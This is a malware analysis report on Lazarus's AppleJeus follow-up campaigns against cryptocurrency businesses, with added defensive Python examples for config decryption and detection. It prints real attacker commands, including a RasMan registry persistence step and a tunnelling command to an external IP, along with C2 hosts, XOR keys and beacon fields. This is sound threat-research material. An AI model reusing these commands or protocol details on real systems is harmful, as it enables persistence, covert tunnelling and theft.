
How to conduct AppleJeus Action Analysis

2025-02-24 Update From: SLTechnology News&Howtos


Shulou (Shulou.com) 05/31 Report


Lazarus is one of the most active APT groups today. In 2018, Kaspersky uncovered a campaign by the group named AppleJeus, which was Lazarus's first attack aimed at macOS users. To reach macOS users, Lazarus developed macOS malware that added an authentication mechanism, fetched the later-stage payload carefully, and loaded the next stage in memory without writing it to disk. For Windows users, they built a multi-stage infection chain. After the AppleJeus analysis was published, Lazarus became more cautious and adopted additional methods to evade detection.

AppleJeus follow-up

After the AppleJeus analysis was published, Lazarus kept using a similar modus operandi against cryptocurrency businesses, and researchers found more macOS malware resembling the AppleJeus samples. The installers are built from common code, and the fake trading application is based on QtBitcoinTrader, developed by Centrabit.

The three macOS installers use similar post-install scripts to fetch the payload and run the same command to execute the retrieved second-stage payload. A further macOS sample, MarkMakingBot.dmg (be37637d8f6c1fbe7f3ffc702afdfe1d), was also identified; it was created on 2019-03-12 but does not encrypt its network traffic, so it is presumed to be an intermediate stage in the evolution of the macOS malware.

Changes in Windows malware

Continuous tracking of this activity revealed that a victim was hit by the Windows AppleJeus malware in March 2019. The infection started with a malicious file named WFCUpdater.exe, delivered through a fake website, wfcwallet[.]com.

The attacker used a multi-stage infection as before, but the method changed. The infection begins with .NET malware disguised as a WFC Wallet updater (a9e960948fdac81579d3b752e49aceda). When executed, the .NET binary checks whether its command-line argument is "/Embedding", then decrypts the WFC.cfg file in the same folder using a hard-coded 20-byte XOR key (82 d7 ae 9b 36 7d fc ee 41 65 8f fa 74 cd 2c 62 b7 59 f5 62) and connects to one of the C2 servers:

wfcwallet[.]com (resolved IP: 108.174.195.134)

www.chainfun365[.]com (resolved IP: 23.254.217.53)
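The config decryption step described above is a plain repeating-key XOR, which is easy to reproduce and to verify against a sample. The following is an added example written for this page, not code from the original report or from the malware: it decrypts a WFC.cfg-style blob with the 20-byte key quoted in the text, sanity-checks the result, and shows the known-plaintext trick an analyst uses to confirm the key from the encrypted file alone. The encrypted blob and the plaintext config it is derived from are constructed here so the example runs offline.

```python
# Added example, not code from the original report or from the malware:
# decrypt a repeating-key XOR configuration file of the kind described for
# WFC.cfg. The 20-byte key is the one quoted above; the encrypted blob is
# CONSTRUCTED here so the example runs offline.

WFC_XOR_KEY = bytes.fromhex("82d7ae9b367dfcee41658ffa74cd2c62b759f562")


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """XOR each byte with the key, cycling through it. XOR is its own
    inverse, so the same call both encrypts and decrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def looks_like_config(plain: bytes) -> bool:
    """Cheap plausibility check: the decrypted buffer should be printable
    ASCII naming at least one URL. A wrong key yields high-entropy junk."""
    try:
        text = plain.decode("ascii")
    except UnicodeDecodeError:
        return False
    return "http" in text and all(c.isprintable() or c in "\r\n\t" for c in text)


def decrypt_wfc_cfg(blob: bytes, key: bytes = WFC_XOR_KEY) -> bytes:
    """Decrypt a config blob and refuse output that does not look like text."""
    plain = xor_repeating(blob, key)
    if not looks_like_config(plain):
        raise ValueError("decryption did not yield a plausible config; wrong key?")
    return plain


def recover_key_bytes(blob: bytes, known_plaintext: bytes) -> bytes:
    """Known-plaintext attack on repeating-key XOR: if the config is known to
    start with e.g. b"https://", XORing that against the ciphertext returns
    the first len(known_plaintext) key bytes, which can then be matched
    against the hard-coded key found in the binary."""
    return bytes(c ^ p for c, p in zip(blob, known_plaintext))


# Constructed stand-in for a plaintext config listing the two C2 hosts named
# above (defanged), encrypted with the same routine to give a sample WFC.cfg.
SAMPLE_CONFIG = (
    b"https://wfcwallet[.]com/update\r\n"
    b"https://www.chainfun365[.]com/update\r\n"
)
SAMPLE_WFC_CFG = xor_repeating(SAMPLE_CONFIG, WFC_XOR_KEY)

if __name__ == "__main__":
    print(decrypt_wfc_cfg(SAMPLE_WFC_CFG).decode())
    print(recover_key_bytes(SAMPLE_WFC_CFG, b"https://").hex())
```

The plausibility check matters in practice: a repeating-key XOR with the wrong key never errors, it just returns noise, so a decryptor that does not validate its output will happily hand an analyst garbage.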

The attacker's commands are then executed to install the next-stage payload. The attacker places two files in the victim's system folder, rasext.dll and msctfp.dat, and registers the next stage through the RasMan (Remote Access Connection Manager) Windows service. After basic reconnaissance, the attacker manually plants the payload with the following commands:

cmd.exe /c dir rasext.dll

cmd.exe /c dir msctfp.dat

cmd.exe /c tasklist /svc | findstr RasMan

cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RasMan\ThirdParty /v DllName /d rasext.dll /f

To establish a remote tunnel, the attacker deployed further tools driven by command-line arguments, but the researchers could not obtain the tool files themselves.

Port opener:

%APPDATA%\Lenovo\devicecenter\Device.exe 6378

Tunneling tool:

%APPDATA%\Lenovo\devicecenter\CenterUpdater.exe 127.0.0.1 6378 104.168.167.16 443
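The command sequence above (staging checks, RasMan service reconnaissance, the RasMan ThirdParty DllName registration, a local port opener and a reverse tunnel out to port 443) is what a defender would want to catch in process-creation telemetry. The following is an added example, not part of the original report: a small rule set run over constructed command lines that mirror the quoted commands, with a correlation step that ties the tunnel's local port back to the port opener. The event lines, the victim path and the benign noise are constructed for the demo.

```python
# Added example, not part of the original report: detection rules over
# process-creation command lines for the post-exploitation chain described
# above. EVENTS is CONSTRUCTED to mirror the quoted commands plus benign noise.
import re
from typing import List, Tuple

RULES: List[Tuple[str, re.Pattern]] = [
    # reg add ...\services\RasMan\ThirdParty /v DllName ... (persistence)
    ("rasman_thirdparty_dllname_persistence",
     re.compile(r"\breg(?:\.exe)?\s+add\s+\S*\\services\\RasMan\\ThirdParty\b"
                r".*\s/v\s+DllName\b", re.I)),
    # tasklist /svc | findstr RasMan (checking the service hosting process)
    ("rasman_service_recon",
     re.compile(r"\btasklist\s+/svc\s*\|\s*findstr\s+RasMan\b", re.I)),
    # dir rasext.dll / dir msctfp.dat (verifying the staged artifacts)
    ("staged_artifact_check",
     re.compile(r"\bdir\s+(?:rasext\.dll|msctfp\.dat)\b", re.I)),
    # Device.exe <port> under a devicecenter folder (local port opener)
    ("local_port_opener",
     re.compile(r"\\devicecenter\\Device\.exe\s+(\d{1,5})\s*$", re.I)),
    # CenterUpdater.exe 127.0.0.1 <port> <ip> 443 (tunnel to external host)
    ("tunnel_to_external_443",
     re.compile(r"\\devicecenter\\CenterUpdater\.exe\s+127\.0\.0\.1\s+(\d{1,5})"
                r"\s+(\d{1,3}(?:\.\d{1,3}){3})\s+443\b", re.I)),
]

# Constructed process command lines; the first six mirror the article, the
# last three are benign noise that must not fire.
EVENTS = [
    r"cmd.exe /c dir rasext.dll",
    r"cmd.exe /c dir msctfp.dat",
    r"cmd.exe /c tasklist /svc | findstr RasMan",
    r"cmd.exe /c reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\RasMan\ThirdParty /v DllName /d rasext.dll /f",
    r"C:\Users\victim\AppData\Roaming\Lenovo\devicecenter\Device.exe 6378",
    r"C:\Users\victim\AppData\Roaming\Lenovo\devicecenter\CenterUpdater.exe 127.0.0.1 6378 104.168.167.16 443",
    r"cmd.exe /c dir C:\Users\victim\Documents",
    r"reg add HKLM\SOFTWARE\Vendor\App /v Version /d 2 /f",
    r"tasklist /svc | findstr spoolsv",
]


def scan(command_lines):
    """Return (rule_name, command_line) for every rule that fires."""
    hits = []
    for cmd in command_lines:
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append((name, cmd))
    return hits


def matched_tunnels(command_lines):
    """Correlate port opener and tunnel: a CenterUpdater.exe tunnel whose
    local port was opened by Device.exe yields (local_port, remote_ip)."""
    rules = dict(RULES)
    opened = {int(m.group(1))
              for m in map(rules["local_port_opener"].search, command_lines) if m}
    out = []
    for m in map(rules["tunnel_to_external_443"].search, command_lines):
        if m and int(m.group(1)) in opened:
            out.append((int(m.group(1)), m.group(2)))
    return out


def triage(command_lines):
    """Persistence plus at least two other stages of the chain on the same
    host is high confidence; any single hit is still worth a look."""
    names = {n for n, _ in scan(command_lines)}
    if "rasman_thirdparty_dllname_persistence" in names and len(names) >= 3:
        return "high"
    return "medium" if names else "none"


if __name__ == "__main__":
    for name, cmd in scan(EVENTS):
        print(f"{name:40s} {cmd}")
    print("tunnels:", matched_tunnels(EVENTS), "triage:", triage(EVENTS))
```

The persistence rule is the one worth keeping even in isolation: a third-party DLL registered under RasMan\ThirdParty is rare on a normal workstation, so a change to that DllName value is a strong signal regardless of the rest of the chain.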

macOS malware changes: JMTTrading

macOS malware variants were also found while tracking this activity. The attackers named their fake website and application JMTTrading, and other researchers and security vendors have already published extensive technical details, so only the differences from the earlier attacks are highlighted here:

Attackers use GitHub to host their malicious applications.

The malware authors used Objective-C instead of the Qt framework for the macOS malware.

The malware implements a simple backdoor function in the macOS executable file.

As in previous cases, the malware encrypts and decrypts data with a 16-byte XOR key.

The Windows version of malware uses ADVobfuscator to hide its code.

The installation script for macOS malware is significantly different from previous versions.

UnionCryptoTrader

Another attack against macOS was also identified, with a malicious program called UnionCryptoTrader; security researcher dineshdina04 found the same case. In summary:

The installation script is the same as the script used by JMTTrading.

The malware author developed this macOS malware in Swift.

The malware author changed the information-collection method.

The malware now authenticates with auth_signature and auth_timestamp parameters before the second-stage payload is delivered.

The malware loads the next-stage payload without writing it to disk.

Windows version of UnionCryptoTrader

The researchers found the Windows version of UnionCryptoTrader (0f03ec3487578cef2398b5b732631fec). It was downloaded via Telegram Messenger and executed from:

C:\Users\[user name]\Downloads\Telegram Desktop\UnionCryptoTraderSetup.exe

In addition, the attacker's Telegram contact was found on the fake website, which strongly supports the conclusion that the installer was sent through Telegram Messenger. Because the payloads run only in memory, not all related files could be obtained. The overall infection chain closely resembles WFCWallet's, with an added injection step.

The Windows version of UnionCryptoTrader displays a window with price charts for several cryptocurrencies.

The Windows version of the UnionCryptoTrader updater (629b9de3e4b84b4a0aa605a3e9471b31) is similar to the macOS version. Judging by the build path (Z:\Loader\x64\Release\WinloaderExe.pdb), the authors refer to this component as a loader. When started, it collects basic information about the victim and sends it in an HTTP POST request.

If the C2 server responds with HTTP 200, the loader decrypts the payload and loads it into memory, then reports back with act=done. The next-stage payload it downloads (e1953fa319cc11c2f003ad0542bca822) is similar to WFCWallet's .NET downloader: it decrypts the Adobe.icx file in the same folder, injects the next payload into an Internet Explorer process, and executes the attacker's commands.

The final payload (dd03c6eb62c9bf9adaf831f1d7adcbab) is the same one that was manually implanted in the WFCWallet case. The authors deploy it only on specific systems chosen from the previously collected information: the malware inspects the infected system and compares its details with given values.

The Windows malware reads the encrypted msctfp.dat file from the system folder and loads each configuration item, executing additional commands based on the file's contents. It talks to the C2 server with POST requests carrying predefined headers.

In the initial communication the malware first sends these parameters:

cgu: 64-bit hexadecimal value from the configuration

aip: MD5 hash value from the configuration

sv: hard-coded value

If the C2 server responds with HTTP 200, the malware sends the next POST request with encrypted data and random values, which the attacker uses to identify each victim and to validate the request:

imp: randomly generated value

dsh: XOR value of imp

hb_tp: XOR value of imp (key: 0x67BF32)

hb_dl: encrypted data sent to the C2 server

ct: hard-coded value

Finally, the malware downloads the next phase of the payload and decrypts it.
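The two POST bodies above carry enough structure to fingerprint the loader on the wire: fixed field sets, a 16-hex-digit cgu, a 32-hex-digit aip, and the rule that hb_tp equals imp XOR 0x67BF32. The following is an added example, not from the original report: a classifier that form-decodes a captured body, checks the field set and formats, and verifies the imp/hb_tp relation, rejecting bodies with duplicate or malformed fields. The sample bodies are constructed. Two assumptions are made because the article does not state them: imp and hb_tp are assumed to travel as decimal integers, and since dsh's XOR key is not given, dsh is only checked for presence.

```python
# Added example, not from the original report: classify the two POST bodies
# the UnionCryptoTrader loader sends and verify hb_tp = imp XOR 0x67BF32.
# Sample bodies are CONSTRUCTED. ASSUMPTION: imp and hb_tp are decimal
# integers on the wire; the article does not state the encoding. The dsh XOR
# key is not given, so dsh is only checked for presence.
import re
from urllib.parse import parse_qs

HB_TP_KEY = 0x67BF32                           # XOR key for hb_tp, from the article
HEX64 = re.compile(r"^[0-9a-f]{16}$", re.I)    # cgu: 64-bit value as hex
MD5 = re.compile(r"^[0-9a-f]{32}$", re.I)      # aip: MD5 hash as hex

STAGE1_FIELDS = {"cgu", "aip", "sv"}
STAGE2_FIELDS = {"imp", "dsh", "hb_tp", "hb_dl", "ct"}


def parse_body(body: str) -> dict:
    """Form-decode a POST body into single-valued fields. Malformed pairs or
    duplicate keys return {} so a crafted body cannot force a sloppy match."""
    try:
        parsed = parse_qs(body, keep_blank_values=True, strict_parsing=True)
    except ValueError:
        return {}
    fields = {}
    for key, values in parsed.items():
        if len(values) != 1:
            return {}
        fields[key] = values[0]
    return fields


def classify(body: str):
    """Return "stage1", "stage2" or None for a POST body."""
    f = parse_body(body)
    keys = set(f)
    if keys == STAGE1_FIELDS:
        if HEX64.match(f["cgu"]) and MD5.match(f["aip"]) and f["sv"]:
            return "stage1"
        return None
    if keys == STAGE2_FIELDS:
        try:
            imp, hb_tp = int(f["imp"]), int(f["hb_tp"])
        except ValueError:
            return None
        # The loader derives hb_tp from imp with a fixed key; a beacon that
        # fails this relation is not this loader (or has been tampered with).
        if hb_tp == (imp ^ HB_TP_KEY) and f["hb_dl"] and f["ct"]:
            return "stage2"
    return None


# Constructed sample bodies; cgu, aip, hb_dl and ct values are placeholders.
SAMPLE_IMP = 1234567890
STAGE1_BODY = "cgu=0123456789abcdef&aip=d41d8cd98f00b204e9800998ecf8427e&sv=1"
STAGE2_BODY = (f"imp={SAMPLE_IMP}&dsh=0&hb_tp={SAMPLE_IMP ^ HB_TP_KEY}"
               "&hb_dl=AAAA&ct=1")

if __name__ == "__main__":
    for body in (STAGE1_BODY, STAGE2_BODY, "foo=bar"):
        print(classify(body), body)
```

Because the relation between imp and hb_tp is deterministic, it is a better signature than any individual value: the attacker randomises imp per victim, but cannot change the XOR constant without rebuilding the loader.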

In addition, several fake websites that are still online were found during the investigation of its infrastructure.

Summary

During the AppleJeus follow-up, several victims were found in the UK, Poland, Russia and China, some of which were related to the cryptocurrency business.

The attacker changed both the macOS and Windows malware, added an authentication mechanism to the macOS downloader, and switched the macOS development framework. The Windows infection chain also differs from earlier ones. Lazarus's financially motivated attacks will continue.
